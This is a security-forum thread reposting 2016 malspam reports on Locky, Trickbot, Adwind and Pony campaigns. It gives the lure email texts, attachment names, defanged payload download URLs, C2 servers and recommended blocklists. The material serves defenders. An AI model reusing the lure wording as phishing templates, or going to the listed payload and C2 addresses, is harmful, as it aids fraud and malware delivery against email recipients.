> https://gist.githubusercontent.com/...2ca8fc4df7edb464d2fa5e3f9d4e665cb1de/dinj.xml
Conclusion: Trick Bot have many similarities with Dyreza, that are visible at the code design level as well as the communication protocol level. However, comparing the code of both, shows, that it has been rewritten from scratch. So far, Trick Bot does not have as many features as Dyreza bot. It may be possible, that the authors intentionally decided to make the main executable lightweight, and focus on making it dynamically expendable using downloaded modules. Another option is that it still not the final version. One thigh is sure – it is an interesting piece of work, written by professionals. Probability is very high, that it will become as popular as its predecessor."
Appendix: http://www.threatgeek.com/2016/10/trickbot-the-dyre-connection.html – analysis of the TrickBot at Threat Geek Blog
'Trickbot C2s:
188.138.1.53 :8082
27.208.131.97 :443
37.109.52.75 :443
91.219.28.77 :443
193.9.28.24 :443
37.1.209.51 :443
138.201.44.28 :443
188.116.23.98 :443
104.250.138.194 :443
46.22.211.34 :443
68.179.234.69 :443
5.12.28.0 :443
36.37.176.6 :443'
(More detail at the malwarebytes URL at the top of this post.)

:fear::fear: :mad:
 
Last edited:
Fake 'Budget forecast', 'Scan Data', 'Wrong model' SPAM

FYI...

Fake 'Budget forecast' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/budget-forecast-malspam-delivers-locky-with-a-shit-extension/
25 Oct 2016 - "... Locky downloader.. an email with the subject of 'Budget forecast' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with 'budget' containing a vbs file that pretends to be an Excel .XLS file... One of the emails looks like:
From: Alejandra Rojas <Rojas.2910@ dsldevice .lan>
Date: Mon 24/10/2016 22:38
Subject: Budget forecast
Attachment: budget_xls_b71db945.zip
[redacted] asked me to send you the Budget forecast for next project. Please check and ask him if you are not clear with the task.

25 October 2016: budget_xls_b71db945.zip: Extracts to: budget 34A81F8A xls.vbs
Current Virus total detections 2/55*.. MALWR** shows a download of an encrypted file from
http ://fannyfuff .com/7qx9pmdt which is transformed by the script to QoTcrNU2qu051Uv0.dll (VirusTotal 21/57***).
Neither MALWR nor Payload Security[4] are showing the encrypted files... That might be due to a sandbox/ VM protection in the malware or it might not have run properly. Earlier versions yesterday [1] [2] using WSF, JS or HTA delivery methods did run fully in the online sandboxes. The vbs versions might not... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...f5e88b40f71e2994c05508ce/analysis/1477345935/

** https://malwr.com/analysis/MjY2NmFhM2NlNDMwNDYxNDhhMWZjNmJkM2YxNGYyYzk/
Hosts
67.171.65.64
77.123.137.221
91.200.14.124
91.226.92.225
185.102.136.77
69.195.129.70

*** https://www.virustotal.com/en/file/...a4124c159efbd508218441bb/analysis/1477378265/

4] https://www.hybrid-analysis.com/sam...ac7f5e88b40f71e2994c05508ce?environmentId=100
Contacted Hosts
201.238.211.140
91.226.92.225
185.102.136.77
77.123.137.221
91.200.14.124
69.195.129.70

1] https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky-using-a-shit-extension/

2] https://myonlinesecurity.co.uk/blan...ail-com-delivers-locky-with-a-shit-extension/
___

Fake 'Scan Data' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-blank-document-file-image.html
25 Oct 2016 - "Perhaps minimalist spam works better - there is currently a Locky spam run with on of the subjects 'Blank / Document / File / Image / img / IMG / Pic / Picture / Scan Data' plus a number (e.g. "Picture 4") with a ZIP file attached matching the subject (e.g. Picture 4.zip) which in turn contains a malicious Javascript... There is no body text... These automated analyses [1] [2]... show that it is Locky...
(Long list of domain-names at the dynamoo URL above.)
... The URL is appended with a random query string, e.g. ?EsIemTBBP=LHvybwFTeh
A malicious DLL is dropped with an MD5 of 7a131fff8eaf144312494988300d7dc1 and a detection rate of 4/56*. The malware then phones home to one of the following locations:
185.127.27.100/linuxsucks .php [hostname: artem.kotyuzhanskiy.example.com] (JSC "Informtehtrans", Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy.example.com] (SKS-Lugan / VHoster, Ukraine)
77.123.137.221/linuxsucks .php (Volia DataCentre, Ukraine)
... Recommended blocklist:
185.127.27.100
91.200.14.124
77.123.137.221 "
1] https://www.hybrid-analysis.com/sam...cc6e5e3fa13701fa36d4eb47a6b?environmentId=100
Contacted Hosts
103.247.11.115
46.105.246.22
91.200.14.124
185.127.27.100
77.123.137.221

2] https://www.hybrid-analysis.com/sam...cdedff614c63243ddc33a2bbf80?environmentId=100
Contacted Hosts
203.190.54.3
91.200.14.124
77.123.137.221
185.127.27.100

* https://virustotal.com/en/file/5948...9c78e6b021b6af6928f16a0d/analysis/1477405965/

- https://myonlinesecurity.co.uk/blank-image-picture-doc-malspam-delivers-locky/
25 Oct 2016 - "... Locky downloader... a blank empty email with a variety of subjects like scan, image, pic, doc etc. pretending to come form random names at Gmail .com with a zip attachment that matches the subject containing a js file... Some of the subjects seen include:
Image 249
Blank 962
Document 7
Pic 3
Scan Data 405
Picture 125
File 11
Doc 74
img 7

One of the emails looks like:
From: HUGH HALVERSON <hughhalverson94@ gmail .com>
Date: Tue 25/10/2016 14:47
Subject: Image 249
Attachment: Image 249.zip

Body content: totally empty/blank

25 October 2016: Image 249.zip: Extracts to: Pic 767.js - Current Virus total detections 9/54*
.. MALWR** shows a download of an encrypted file from
http ://rajashekharkubasad .com/g76dbf?ettSsUhngke=NlfFMTpqoQa which is transformed by the script to WgNUiSSFP1.dll (VirusTotal 3/56***). Payload Security[4] shows this version is using .thor extension for the encrypted files... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...d5363393cca623288c099616/analysis/1477403985/

** https://malwr.com/analysis/NDRiZTdiZmRhMjBjNGYzZmIzN2QzNzk3N2U0YzEyMjc/
Hosts
43.225.54.151

*** https://www.virustotal.com/en/file/...9c78e6b021b6af6928f16a0d/analysis/1477405261/

4] https://www.hybrid-analysis.com/sam...9f7d5363393cca623288c099616?environmentId=100
Contacted Hosts
43.225.54.151
185.127.27.100
77.123.137.221
91.200.14.124
___

Fake 'Wrong model' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/wrong-model-malspam-delivers-locky/
25 Oct 2016 - "... Locky downloader... an email with the subject of 'Wrong model' coming as usual from random companies, names and email addresses with a semi random named zip attachment starting with fixed_invoice containing a vbs file... One of the emails looks like:
From: Randal Burks <Burks.3744@ pocketgreens .com>
Date: Tue 25/10/2016 19:45
Subject: Wrong model
Attachment: fixed_invoice_74957728.zip
We apologize for sending the wrong model of the product yesterday. Attached is the new invoice for your product No. 31066460.

25 October 2016: fixed_invoice_74957728.zip: Extracts to: fixed invoice 8A3254C.vbs
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://idesjot .net/3ab4af which is transformed by the script to B0HRoIuyMVXc7V.dll (VirusTotal 13/57***)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...2085383f06216bbf86144a43/analysis/1477421251/

** https://malwr.com/analysis/YjQyNWRmYTEyMWE2NGRjYzkzYjY4ZTc2YjI5MzgxMzA/
Hosts
67.171.65.64

*** https://www.virustotal.com/en/file/...41f443818c51cbc250350fd6/analysis/1477421558/
___

Another Day, Another Spam...
- https://isc.sans.edu/diary.html?storyid=21635
2016-10-25 - "... attackers have always new ideas to deliver their malicious content to us... Attached to this mail, a malicious ZIP file with a .pif file inside. The file is in fact a PE file (MD5: 2aa0d2ae9f8492e2b4acda1270616393). The hash was unknown to VT but once uploaded, it was reported as a very old worm, nothing very malicious... The second example was received by one of our readers is a -fake- SharePoint notification:
> https://isc.sans.edu/diaryimages/images/sharepoint-spam.png
The link points to hxxp ://thekchencholing .org/.https/www/sharepoint.com/sites/shareddocument/SitePages/Home.aspx/index.php?wreply=YW5keS5nZXJhZXJ0c0BjZWdla2EuYmUN (the site has been cleaned up in the meantime). SharePoint is a common Microsoft tool used in big organizations and people could be lured by this kind of message. Most spam campaigns are easy to detect but some messages, when properly redacted, may lure the victim easily. We are never far from an unfortunate click. Stay safe!.."

thekchencholing .org: 180.210.205.66: https://www.virustotal.com/en/ip-address/180.210.205.66/information/
>> https://www.virustotal.com/en/url/c...faaff7dda425e1c8c5b4053a16d7e89b208/analysis/

:fear::fear: :mad:
 
Last edited:
Fake 'Help Desk', 'Your order', 'Invoice' SPAM, WhatsApp SCAMS

FYI...

Fake 'Help Desk' SPAM - leads to Adwind
- http://blog.dynamoo.com/2016/10/malware-spam-western-union-help-desk.html
26 Oct 2016 - "Just by way of a change, here's some -malspam- that doesn't lead to Locky:

Screenshot: https://3.bp.blogspot.com/-dlvhqYrM...rwDeXYquGIY5GqH5FqLaQEkRlp7wCLcB/s1600/wu.png

In this case, the link in the email goes to:
linamhost .com/host/Western_Union_Agent_Statement_and_summary_pdf.jar
This is a Java file - if you don't have Java installed on your PC (and why would you want this 1990s relic anyway?) then it -won't- run. VirusTotal* identifies it as the Adwind Backdoor**. The Malwr report[3] shows it attempting to contact:
boscpakloka .myvnc .com [158.69.56.128] (OVH, US)
A whole bunch of components are downloaded and frankly I haven't had time to look, but it shares characteristics with the one reported at Malware-Traffic-Analysis[4]. Check the Dropped Files section of the Malwr Report[3] for more. Personally, I recommend blocking -all- dynamic DNS domains such as myvnc .com in corporate environments. At the very least I recommend blocking 158.69.56.128."
* https://virustotal.com/en/file/51d0...ed24fffb8e5cf1e7aa75ede2/analysis/1477480451/

** https://www.f-secure.com/v-descs/backdoor_java_adwind.shtml

3] https://malwr.com/analysis/ZGJmZTZmODg1Y2IxNGY1ODlkZmUxNmYzMTdmNjg2MDE/
Hosts
158.69.56.128: https://www.virustotal.com/en/ip-address/158.69.56.128/information/
>> https://www.virustotal.com/en/url/5...a7f9d3a6638febb06463f2dc498fd20e69c/analysis/

4] http://www.malware-traffic-analysis.net/2016/10/23/index2.html

myvnc .com: 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
>> https://www.virustotal.com/en/url/a...10ac06174239692add1fce57478f4e01802/analysis/
___

Fake 'Your order' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-your-order-has-been.html
26 Oct 2016 - "This curiously worded spam email leads to Locky ransomware:
Subject: Your order has been proceeded
From: Elijah Farrell
Date: Wednesday, 26 October 2016, 12:41
Your order has been proceeded.
Attached is the invoice for your order 2026326638.
Kindly keep the slip in case you would like to return or state your product's warranty.

The name of the sender is randomly generated, as is the reference number. Attached is a ZIP file beginning with "order_details_" plus a random sequence, containing a malicious .VBS script with a similar name. The various scripts download a component... (thank you to my usual source for this)
(Long list of domain-names at the dynamoo URL above.)
The downloaded binary then phones home to:
78.46.170.94/linuxsucks .php [hostname: k-42 .ru] (Corem, Russia / Hetzner, Germany)
95.46.98.25/linuxsucks .php [hostname: 97623-vds-artem.kotyuzhanskiy.gmhost .hosting] (Mulgin Alexander Sergeevich aka GMHost, Ukraine)
91.226.92.225/linuxsucks .php [hostname: weblinks-3424 .ru] (Sobis, Russia)
It also tries to phone home...
Recommended blocklist:
78.46.170.64/27
95.46.98.0/23
91.226.92.225 "

- https://myonlinesecurity.co.uk/your-order-has-been-proceeded-malspam-delivers-locky/
26 Oct 2016 - "... Locky downloader.. which is running concurrently with THIS[1] is an email with the subject of 'Your order has been proceeded' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with order_details containing a vbs file... typical subject line is 'Your order has been processed' -not- 'Your order has been proceeded'...
1] https://myonlinesecurity.co.uk/invoice-350797-93872806-090-9b5248a-malspam-delivers-locky/
... One of the emails looks like:
From: Alex Gonzalez <Gonzalez.46337@ solardelaluna .com>
Date: Wed 26/10/2016 12:35
Subject: Your order has been proceeded
Attachment: order_details_56f220432.zip
Your order has been proceeded. Attached is the invoice for your order 9563076204. Kindly keep the slip in case you would like to return or state your product’s warranty.

26 October 2016: order_details_56f220432.zip: Extracts to: order details 144BAA.vbs
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://hankookm.com/lun77kyf which is transformed by the script to q3SAQ4aZNZ0p.dll ...
C2 are http ://95.46.98.25 /linuxsucks.php and http ://umjjvccteg .biz/linuxsucks.php
Payload Security[3] shows several others as well... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...7d26a96347223f43ab2f1ab4/analysis/1477482479/

** https://malwr.com/analysis/NzE2YWY2YTkyNDczNDNhMmE3NmE3ZWRjYjkyMTBlNzE/
Hosts
101.79.129.33
95.46.98.25
78.46.170.94
91.226.92.225
69.195.129.70

3] https://www.hybrid-analysis.com/sam...6447d26a96347223f43ab2f1ab4?environmentId=100
Contacted Hosts
173.254.70.156
95.46.98.25
91.226.92.225
78.46.170.94
___

Fake 'Invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/invoice-350797-93872806-090-9b5248a-malspam-delivers-locky/
26 Oct 2016 - "... Locky downloader.. an email with the subject of 'Invoice-350797-93872806-090-9B5248A' (random numbers) pretending to come from invoice@ random companies and email addresses with a random numbered invoice zip attachment containing a jse file... One of the emails looks like:
From: invoices@ greyport .net
Date: Wed 26/10/2016 12:35
Subject: Invoice-350797-93872806-090-9B5248A
Attachment: 20161026_93872806_Invoice.zip
Dear Customer,
Please find attached Invoice 93872806 for your attention.
Should you have any Invoice related queries please do not hesitate to contact either your designated Credit Controller or the Main Credit Dept. on 01635 279370.
For Pricing or other general enquiries please contact your local Sales Team.
Yours Faithfully,
Credit Dept’ ...

26 October 2016: 20161026_93872806_Invoice.zip: Extracts to: 167402123_Invoice.jse
Current Virus total detections 7/55*. MALWR was unable to show any connections or downloads. Payload Security** shows a download of an encrypted file from
glyderm .com.ph/t76f3g?awKAvfeuvvV=PyooUmcME but doesn’t show or allow download of the actual Locky binary... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...3fa75460d8322abaae14e889/analysis/1477481832/

** https://www.hybrid-analysis.com/sam...c383fa75460d8322abaae14e889?environmentId=100
Contacted Hosts
162.214.20.198
91.200.14.124
144.76.177.194
185.127.27.100
69.195.129.70
52.32.150.180
54.230.197.227
___

WhatsApp in-the-wild scams
- https://blog.malwarebytes.com/cyber...sapp-users-warned-of-latest-in-the-wild-scam/
Oct 26, 2916

Other related post(s):
WhatsApp Elegant Gold Hits the Digital Catwalk
> https://blog.malwarebytes.com/cybercrime/2015/07/whatsapp-elegant-gold-hits-the-digital-catwalk/
Don’t Get Stuck on WhatsApp Stickers…
> https://blog.malwarebytes.com/cybercrime/2015/09/dont-get-stuck-on-whatsapp-stickers/
Scams, PUPs Target Would-be WhatsApp Voice Users
> https://blog.malwarebytes.com/cybercrime/2015/03/scams-pups-target-would-be-whatsapp-voice-users/
WhatsApp Hack Promises Messages, Delivers PUPs
> https://blog.malwarebytes.com/cybercrime/2014/02/whatsapp-hack-promises-messages-delivers-pups/
WhatsApp Spam Campaign Leads to Malware
> https://blog.malwarebytes.com/cybercrime/2014/02/whatsapp-spam-campaign-leads-to-malware/

:fear::fear: :mad:
 
Last edited:
Fake 'Bill overdue', 'Account Reactivation', 'Order Details', 'E-TICKET' SPAM

FYI...

Fake 'Bill overdue' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/bill-overdue-fake-telephone-bill-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... an email with the subject of 'Bill overdue' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with detailed_bill containing a vbs file... One of the emails looks like:
From: Edmund Parks <Parks.390@ airtelbroadband .in>
Date: Thu 27/10/2016 09:11
Subject: Bill overdue
Attachment: detailed_bill_251752d.zip
This is from the Telephone Company to remind you that your bill is overdue. Please see the attached bill for the fine charge.

27 October 2016: detailed_bill_251752d.zip: Extracts to: detailed bill 1C938E2.vbs
Current Virus total detections 7/55*. MALWR** shows a download of an encrypted file from
http ://tahradeep .com/1tuqd which is transformed by the script to yNBjdb1LZklImF.dll (VirusTotal 11/57***).
C2 are http ://83.217.11.193 /linuxsucks.php | http ://91.201.42.24 /linuxsucks.php
Payload Security[4] shows a few different download locations for the encrypted files but no C2... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...e7d14a6157592ce2ecee7002/analysis/1477556155/

** https://malwr.com/analysis/ZTE3YTBhYzBhN2M4NDI5NmI2MjVhZTE0YWZiMmM2ODU/
Hosts
67.171.65.64
91.201.42.24
83.217.11.193

*** https://www.virustotal.com/en/file/...55db9d23ce3ec6a5c8d4f6a5/analysis/1477557085/

4] https://www.hybrid-analysis.com/sam...b54e7d14a6157592ce2ecee7002?environmentId=100
Contacted Hosts
67.171.65.64
119.29.37.110
122.114.89.157

- http://blog.dynamoo.com/2016/10/malware-spam-this-is-from-telephone.html
27 Oct 2016 - "This -fake- financial spam leads to Locky ransomware:
Subject: Bill overdue
From: Alexandria Maxwell
Date: Thursday, 27 October 2016, 9:35
This is from the Telephone Company to remind you that your bill is overdue.
Please see the attached bill for the fine charge.

The sender name varies. Attached is a ZIP file which in the sample I saw was named detailed_bill_a9ec14342.zip containing a malicious script... detailed bill C43A9.vbs. The Malwr Report* and Hybrid Analysis** for that script shows behaviour consistent with Locky ransomware, and my sources (thank you) tell me that the various scripts download...
(Long list of domain-names at the dynamoo URL above.)
... A DLL is dropped with a detection rate of 11/56***, and the malware then phones home to:
91.201.42.24/linuxsucks.php (RuWeb LLC, Russia)
83.217.11.193/linuxsucks.php [hostname: artkoty.fortest .website] (Park-Web Ltd, Russia)
91.230.211.150/linuxsucks.php [hostname: tarasik.freeopti .ru] (Optibit LLC, Russia)
Recommended blocklist:
91.201.42.24
83.217.11.193
91.230.211.150 "

* https://malwr.com/analysis/OWUyNjBhNjhjMDk1NGZlNzg3OGJlMWZkNDI0YTNmMDM/
Hosts
92.53.96.20
91.201.42.24
83.217.11.193

** https://www.hybrid-analysis.com/sam...8ac5e980bfc8763f9bf270c6eaf?environmentId=100
Contacted Hosts
67.171.65.64
83.217.11.193
91.230.211.150
91.201.42.24

*** https://virustotal.com/en/file/f81d...8265c78c1b7f5972a74e5e9e/analysis/1477560896/
___

Fake 'Account Reactivation' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/account-reactivation-western-union-malspam-delivers-java-adwind/
27 Oct 2016 - "... -fake- financial themed emails containing java adwind attachments... The email looks like:
From: Npc@ westernunion .com <accounts@ petnet .com .ph>
Date: Thu 27/10/2016 04:56
Subject: Account Reactivation
Attachment: Account Reactivation.zip
Dear Agent,
Our security team has detected a hacking attempt on your account /Terminal . Luckily, the attempt has been blocked and the account/ terminal has been suspended with no financial loss.
Now in order to reactivate the account and avoid the recurrence of such incident, we strongly recommend that you follow the reactivation process attached and share the outcome with our security team copied.
Let us know if you have any questions.
Kind regards,
Zineb Abdouss
Sr. Regional Operations Specialist, North, and Western Asia
Western Union
7th floor, shore 13
1100 Boulevard Al Qods-Quartier Sidi Maarouf
20270 Casablanca – Morocco ...

27 October 2016: Account Reactivation manual.jar (119kb) - Current Virus total detections 22/56*. MALWR**...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...a10aeddf707c92ea4e949fa5/analysis/1477547372/

** https://malwr.com/analysis/ZjI2YTVjODZlMzc2NDU4Y2IxOGZkZDNlMjZmZGM3MzM/
Hosts
216.107.152.224
___

Fake 'Order Details' SPAM - delivers malware
- https://myonlinesecurity.co.uk/jame...s-delivers-malware-via-malicious-office-docs/
27 Oct 2016 - "An email with the subject of 'Re: Order Details' pretending to come from James Correy <jamescorrey@ gmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Update: I am reliably informed it is a pony dropper with the pony binary embedded inside the word doc using
http ://www .octpendant .org.in/chixthree-18oct-18nov/gate.php

27 October 2016: BL-06038711.DOC - Current Virus total detections 11/54*... a manual analysis of the macro enabled doc shows a connection to http ://travelinsider .com.au/021ygs7 which currently gives a php error... opens in Microsoft word with a message to 'enable editing to see content'... Payload Security** does show an informative download of an .exe file JF.cm d which VirusTotal 15/56*** detects...
> https://myonlinesecurity.co.uk/wp-c...dynamic-content-plugin-missing-1-1024x306.png

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/james-correy-order-detail-1024x621.png

... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...30c2388a0e3315cfa75bbeaf/analysis/1477547380/

** https://www.hybrid-analysis.com/sam...f6d30c2388a0e3315cfa75bbeaf?environmentId=100

*** https://www.virustotal.com/en/file/...09dbbb350a9d9dcb89315c00/analysis/1477548223/
___

Fake 'E-TICKET' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-e-ticket-41648-leads-to.html
27 Oct 2016 - "More Locky ransomware today..
From "Matthew standaloft"
Date Thu, 27 Oct 2016 15:20:27 +0530
Subject E-TICKET 41648
Dear Sir ,
Please find the attached E-ticket as per your requested.
Thanks & Regards ,
Matthew standaloft

Attached is a ZIP file containing a randonly-named .WSF script, downloading more evil... (according to my usual source):
(Long list of domain-names at the dynamoo URL above.)
... This drops a malicious DLL with a detection rate of 9/56*. The following C2 servers are contacts:
83.217.11.193/linuxsucks .php [hostname: artkoty.fortest .website] (Park-Web Ltd, Russia)
91.201.202.12/linuxsucks .php (FLP Anoprienko Artem Arkadevich aka host-ua .com, Ukraine)
213.159.214.86/linuxsucks .php (JSC Server, Russia)
Recommeded blocklist (also see this other spam run** today):
83.217.11.193
91.201.202.12
213.159.214.86 "
* https://www.virustotal.com/en/file/...b3c05dcc06ed07b7dc47b57068798328277/analysis/

** http://blog.dynamoo.com/2016/10/malware-spam-this-is-from-telephone.html

- https://myonlinesecurity.co.uk/e-ticket-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... an email with the subject of 'E-TICKET 0385' (random numbers) coming as usual from random companies, names and email addresses with a semi-random numbered zip attachment that matches the subject number containing a random numbered wsf file... One of the emails looks like:
From: Jacqueline lewis <Jacqueline.lewis022@ pro-youthrodeo .org>
Date: Thu 01/09/2016 19:22
Subject: E-TICKET 0385
Attachment: 0385.zip
Dear Sir ,
Please find the attached E-ticket as per your requested.
Thanks & Regards ,
Jacqueline lewis

27 October 2016: 0385.zip: Extracts to: 8910682.wsf - Current Virus total detections 9/55*
MALWR** shows a download of an encrypted file from http ://139.162.29.193 /g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
which is transformed by the script to mujVqbry1.dll (VirusTotal 9/56***). C2 is:
http ://83.217.11.193 /linuxsucks.php
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...ba0748655f8bc38aa223b021/analysis/1477560672/

** https://malwr.com/analysis/NGVmYjM5ZjlhOWJhNGVlMzhhNDg3MjQyZTI2YWRlM2U/
Hosts
139.162.29.193
83.217.11.193

*** https://www.virustotal.com/en/file/...d07b7dc47b57068798328277/analysis/1477559703/
___

Fake 'Receipt' SPAM - delivers locky
- https://myonlinesecurity.co.uk/blank-email-receipt-malspam-delivers-locky-thor-version/
27 Oct 2016 - "... Locky downloader... a -blank- email with the subject of 'Receipt' 1578-92517 (random numbers) once again pretending to come from random names at Gmail .com with a semi-random named/numbered zip attachment matching the subject line containing a WSF file... One of the emails looks like:
From: ashley.baring@ gmail .com
Date: Thu 27/10/2016 15:15
Subject: Receipt 1578-92517
Attachment: Receipt 1578-92517.zip

Body content: completely blank/empty

27 October 2016: Receipt 1578-92517.zip: Extracts to: Receipt 89598-1810311.wsf
Current Virus total detections 13/55*. MALWR** shows a download of an encrypted file from
http ://www .acclaimenvironmental .co.uk/g67eihnrv?TCwKroMse=uwIrKcwhz which is transformed by the script to TQTOMcCTi1.dll (VirusTotal 7/57***). C2 http ://83.217.11.193 /linuxsucks.php. Payload Security[4] shows additional C2 locations... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...4a6abfc60db7b2239e5119eb/analysis/1477578664/

** https://malwr.com/analysis/ODdmMTZjNzk5OWM1NDRjMWFlNjViMjNmM2YwNTlhZWY/
Hosts
89.145.76.9
83.217.11.193

*** https://www.virustotal.com/en/file/...23da76b97ce9cb22c50f63bc/analysis/1477579336/

4] https://www.hybrid-analysis.com/sam...d9f4a6abfc60db7b2239e5119eb?environmentId=100
Contacted Hosts
89.145.76.9
213.159.214.86
83.217.11.193
91.201.202.12
192.42.116.41
52.32.150.180
54.192.11.30

:fear::fear: :mad:
 
Last edited:
Fake 'New fax received', 'Payment history', 'Document' SPAM, Dridex new '0-Day'

FYI...

Fake 'New fax received' SPAM - delivers Trickbot banking trojan
- https://myonlinesecurity.co.uk/important-new-fax-received-malspam-delivers-trickbot-banking-trojan/
28 Oct 2016 - "... unusual email with the subject of 'Important – New fax received' pretending to come from Administrator <Administrator@ internalfax .net> or Administrator <Administrator@ internalfax .com> with either a malicious word doc attachment or a zip file containing a .js file which downloads Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/Important-New-fax-received-1024x545.png

Both emails pass all validation checks, SPF & DKIM so blow past spam filters and -both- domains are newly registered -today- with the sole aim of spreading malware. Domains are both registered by and hosted by Godaddy..

28 October 2016: InternalFax.js - Current Virus total detections 3/55*. MALWR** shows a download from
http ://www .tessaban .com/admin/images/jsjsjsihfsdkq.png which of course is -not- a png but a renamed .exe file. The JavaScript -renames- it to vQjiLVqR.exe and autoruns it. (VirusTotal 26/56***). Payload Security[4] was unable to contact any download sites or download the malware...

28 October 2016: InternalFax.doc - VirusTotal 2/52[5] | Payload Security[6] shows a download from
futuras.comdodocdoddus .exe which is -renamed- to 10575.exe and autorun by the macro in the word doc
(VirusTotal 8/56[7]) MALWR[8] shows the downloads from either
http ://futuras .com/dodocdoddus.exe or http ://fax-download .com/lindoc1.exe
(fax-download .com registered -yesterday- 27 October 2016 and hosted on 23.95.37.89 host.colocrossing .com)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

futuras .com: 203.199.134.21: https://www.virustotal.com/en/ip-address/203.199.134.21/information/
>> https://www.virustotal.com/en/url/e...50ffa9b18d905940887243514a5c72471fe/analysis/

23.95.37.89: https://www.virustotal.com/en/ip-address/23.95.37.89/information/
>> https://www.virustotal.com/en/url/9...9e83e891319d1ca3c32c203c7117ad0d8cd/analysis/

* https://www.virustotal.com/en/file/...0edf30f06e6d70af6016788a/analysis/1477673159/

** https://malwr.com/analysis/Y2FhZTg2YWU3OTBkNGVjYmE5NzJjYzIyYjM1NmUxNzQ/
Hosts
61.19.247.54
78.47.139.102
91.219.28.77
8.254.207.62
193.9.28.24
37.1.209.51
138.201.44.28
188.116.23.98
104.250.138.194
80.79.114.179

*** https://www.virustotal.com/en/file/...0519973b0bfa1b4fb260a96d/analysis/1477671917/

4] https://www.hybrid-analysis.com/sam...93a0edf30f06e6d70af6016788a?environmentId=100
Contacted Hosts
61.19.247.54
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117

5] https://www.virustotal.com/en/file/...0e9026fbbbfe7fcaa2f65ff1/analysis/1477672660/

6] https://www.hybrid-analysis.com/sam...3750e9026fbbbfe7fcaa2f65ff1?environmentId=100
Contacted Hosts
23.95.37.89
78.47.139.102
91.219.28.77
80.79.114.179
193.124.177.117

7] https://www.virustotal.com/en/file/...db30cc64be14e18c23e5b444/analysis/1477674272/

8] https://malwr.com/analysis/YjUwYzA0OGEyMmU0NGMzMDhmNzM5NzE0ZmVhODZhNmI/
Hosts
210.16.101.168
203.199.134.21
78.47.139.102
54.243.70.107
64.182.208.184
64.182.208.182
64.182.208.181
64.182.208.183
66.171.248.178
188.40.53.51
91.219.28.77
193.9.28.24
___

Fake 'Payment history' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/payment-history-malspam-delivers-locky-thor-version/
28 Oct 2016 - "... Locky downloader... an email with the subject of 'Payment history' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with payment_history containing a VBS file... This is very similar to last night’s Locky malspam[1] where the download is an actual executable file, not an encrypted file needing decoding, although called a txt file. The VBS just renames it to the dll name...
1] https://myonlinesecurity.co.uk/please-review-malspam-delivers-locky-thor-version/
One of the emails looks like:
From: Lionel Hall <Hall.748@ nrjleman .com>
Date: Fri 28/10/2016 09:58
Subject: Payment history
Attachment: payment_history_64b96be.zip
The payment history for the first week of October 2016 is attached as you requested. Please review it and let us know if you have any question.

28 October 2016: payment_history_64b96be.zip: Extracts to: payment history EE5B8 PDF.vbs
Current Virus total detections 8/54*. MALWR** shows a download of a file from
http ://92hanju .com /utl41nrt which is renamed by the script to r7vl3GrYKGPE0uLB0.dll (VirusTotal 12/56***).
C2 is http ://83.217.11.193 /linuxsucks.php . Payload Security[4] shows alternative download locations & C2 but for some strange reason isn’t showing the downloaded Locky binary as malicious... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...781717de7033ea5f9422560c/analysis/1477646733/

** https://malwr.com/analysis/M2IyNmIwYTBkZjdjNDViMWEyZDJkNjYwNTc0OTEzNjc/
Hosts
133.130.109.98
185.154.13.79
83.217.11.193

*** https://www.virustotal.com/en/file/...2696ac259c0e72874aa2fed9/analysis/1477647176/

4] https://www.hybrid-analysis.com/sam...2f3781717de7033ea5f9422560c?environmentId=100
Contacted Hosts
213.176.241.230
185.154.13.79
83.217.11.193
46.148.26.99
194.1.239.152
91.230.211.150

- http://blog.dynamoo.com/2016/10/malware-spam-payment-history-leads-to.html
28 Oct 2016 - "... another spam run pushing Locky ransomware:
Subject: Payment history
From: Theodore Wilkins
Date: Friday, 28 October 2016, 10:09
The payment history for the first week of October 2016 is attached as you requested.
Please review it and let us know if you have any question.

